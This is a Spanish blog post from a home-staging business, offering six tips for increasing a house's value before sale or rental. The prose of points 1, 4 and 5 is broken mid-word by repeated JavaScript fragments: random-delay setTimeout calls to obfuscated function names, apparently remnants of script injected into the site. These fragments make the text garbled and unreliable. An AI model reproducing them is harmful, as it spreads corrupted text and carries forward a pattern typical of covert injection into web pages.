Trucos para aumentar el valor de tu casa

Si tienes pensado vender o alquilar tu vivienda, antes de hacerlo deberías prestar atención a estos consejos que desde Estudio Dream te damos para que incrementes el valor que tiene tu casa y de paso el precio que puedes pedir por ella.

1. LIMPIA LA CASA A FONDO: un cliente estará más dispuesto a comprar tu casa si ve que ya está lista para entrar a vivir. Eso incluye no tener que hacer una limpieza a fondo antes de meter las cosas, y que es segura para los niños. Por otro lado, una casa limpia siempre parece más grandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ande, así que presta especial atención a los rincones donde se suele acumular la suciedad.

2. PINTA LAS PAREDES DE UN COLOR NEUTRO: las paredes deben estar recién pintadas para que parezcan nuevas. Lo mejor es elegir un color neutro tipo blanco, arena o cáscara de huevo, que hacen las estancias más amplias y suelen gustar más a todo el público.

3. LLENA LA CASA DE FLORES: las flores y las plantas alegran mucho un hogar, y si quieres que el futuro comprador se sienta en su propia casa debes llenar todas las estancias de flores bonitas, ya sean naturales o de plástico.

4. MEJORA LA COCINA: está demostrado que la cocina es la estancia más importante de la casa, donde se reúne la familia y donde empieza la magia de los fogones. A toda ama de casa le gusta ver una cocina grandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ande y arreglada. Si la cocina les convence ya tienes el 50% de la casa vendida. cocina vivienda 983

 

5. CUIDA LA FACHADA Y LA PUERTA PRINCIPAL: éstas son las primeras cosas que ve el cliente cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando llega a ver la casa. La primera impresión es fundamental para que entre por la puerta con una actitud positiva y puedas venderle su nuevo hogar.

6. VISTE LAS CAMAS, PERO NO LAS MESAS: las camas siempre han de estar hechas porque a nadie le gusta ver un colchón blanco y soso. Elige unas sábanas que peguen con los muebles y que hagan la cama mullida y cómoda. Por el contrario, nunca deberías dejar los manteles puestos en las mesas. Esto solo da sensación de que quieres ocultar algo o de que la mesa está en mal estado, y aunque así fuera ponerle mantel sólo lo hará más evidente. En su lugar puedes poner un jarrón encima de esa mancha que no quieres que se vea. casa-tiemblo-habitacion

Comments : 0